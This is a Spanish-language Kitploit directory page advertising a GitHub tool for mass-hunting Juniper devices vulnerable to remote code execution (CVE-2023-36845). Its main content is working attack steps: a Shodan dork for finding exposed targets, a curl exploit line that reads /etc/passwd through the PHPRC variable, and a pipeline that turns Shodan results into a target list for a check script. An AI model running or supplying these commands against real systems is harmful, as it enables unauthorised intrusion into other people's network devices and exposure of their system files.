Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Juniper-CVE-2023-36845-Mass-Hunting — Juniper RCE (Remote Code Execution) CVE-2023-36845 es una vulnerabilidad que ha sido identificada dentro del software de Juniper. Esta falla en particular permite la ejecución remota de código, lo que significa que un atacante podría ejecutar código arbitrario en un sistema sin necesidad de acceso físico al dispositivo. | Kitploit
Herramientas/GitHubGitHub/jahithoque/juniper-cve-2023-36845-mass-hunting
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubjahithoque/juniper-cve-2023-36845-mass-hunting

Juniper-CVE-2023-36845-Mass-Hunting

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
1hace 2 añosAún no revisado

Acerca de

Juniper RCE (Remote Code Execution) CVE-2023-36845 es una vulnerabilidad que ha sido identificada dentro del software de Juniper. Esta falla en particular permite la ejecución remota de código, lo que significa que un atacante podría ejecutar código arbitrario en un sistema sin necesidad de acceso físico al dispositivo.

Compartir

Juniper-CVE-2023-36845-Mass-Hunting

Juniper RCE (Ejecución Remota de Código) CVE-2023-36845 es una vulnerabilidad que ha sido identificada en el software de Juniper. Esta falla en particular permite la ejecución remota de código, lo que significa que un atacante podría ejecutar código arbitrario en un sistema sin necesidad de acceso físico al dispositivo.

Cómo encontrar:

Dork de Shodan: http.favicon.hash:2141724739

Úsalo con otros dorks relevantes, como certificados SSL, nombre de la organización, etc., para una búsqueda más específica.

Explotación para un solo host:

curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"’

Automatización:

└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #descargar desde shodan

└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt

└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt

└─# ./Juniper-RCE-check.sh -f juniper-final.txt IMAGEN

Descargar herramienta